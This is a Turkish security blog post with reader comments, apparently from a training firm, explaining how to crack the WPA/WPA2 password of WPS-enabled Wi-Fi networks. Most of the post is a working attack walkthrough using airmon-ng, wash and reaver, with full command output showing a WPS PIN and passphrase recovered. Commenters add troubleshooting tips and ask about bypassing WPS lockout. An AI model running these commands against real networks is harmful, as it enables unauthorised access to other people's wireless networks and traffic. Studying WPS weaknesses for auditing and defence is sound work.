WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

 

WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.

Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Örnek Uygulama
Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.

# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Process with PID 2134 (dhclient3) is running on interface wlan0

Interface Chipset Driver

wlan0 Ralink RT2870/3070 rt2800usb – [phy0]
(monitor mode enabled on mon0)

WPS destekli kablosuz ağları bulmak için,

# wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMIS
I

Hedefimizde “BGA” kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not edelim.

BSSID = 33:22:55:22:11:2F
CH = 9

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: BGA)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ‘47128211’
[+] WPA PSK: ‘benimgizliparolam876!#’
[+] AP SSID: ‘BGA’
[+] Nothing done, nothing to save.

Modemin WPS özelliği kapalıda olsa, saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr

 

49 Yorum

  1. Adsız 23 Ocak 2016 20:53

    Bu konunun en güncel kali sürümü ile revizyon edilmedi gerektiğini düşünüyorum

  2. Adsız 20 Ocak 2016 19:00

    wash -i mon0 -C komutundan sonra imleç sürekli yanıp sönüyor ama hiç ağ bulamıyor???

  3. ramazan 27 Aralık 2015 18:06

    Yuzde 90 da kalir tabi cunku messanger 2 aliyor masanher 4 almiyor almadi icin ilk 4 hane bulamiyor diger 4 hane denicn yani son 4 hane bu cözumle hepsini kirarsin bu programlar yapmaz bunu

  4. byottoman1453 12 Aralık 2015 22:56

    bir soru daha 🙂 daha önce modemlerin mac adreslerinin son altı hanesi wps pini veriyordu şimdi wps kilitlemeli modemlerin mac adreslerinden gerçek wps pin elde edilemiyor, ortaya çıkan wps pinler hep yanlış oluyor. deneme yapıp modemi kilitlemeden wps yi öğrenmenin başka yolu yokmu?

  5. byottoman1453 12 Aralık 2015 22:47

    merhaba modemlerin belirli bir pin wps pin denemesinden sonra wps modunu kapatmasına hala bir çözüm bulunmadımı?

  6. byottoman1453 12 Aralık 2015 22:46

    merhaba modemlerin belirli wps pin denemesinden sonra wps yi kapatmasına hala bir çözüm bulunmadımı?

  7. Adsız 29 Ekim 2015 20:49

    Kali 2'de mon0 yok, wlan0mon olarak görmeniz normal.

  8. muarke 30 Eylül 2015 11:08

    yukaridaki komutta mon0 yazan yerleri wlan0mon ile degistirin

  9. muarke 30 Eylül 2015 11:06

    airmon-ng start wlan0 komutunda yukaridaki ciktigi aldigin icin once airmon-ng check kill komutunu girip calisan uygulamalari kapatin daha sonra airmon-ng start wlan0 komutunu girin. sorun cozulecektir.

Yorum Yaz

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

fifteen − six =

Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.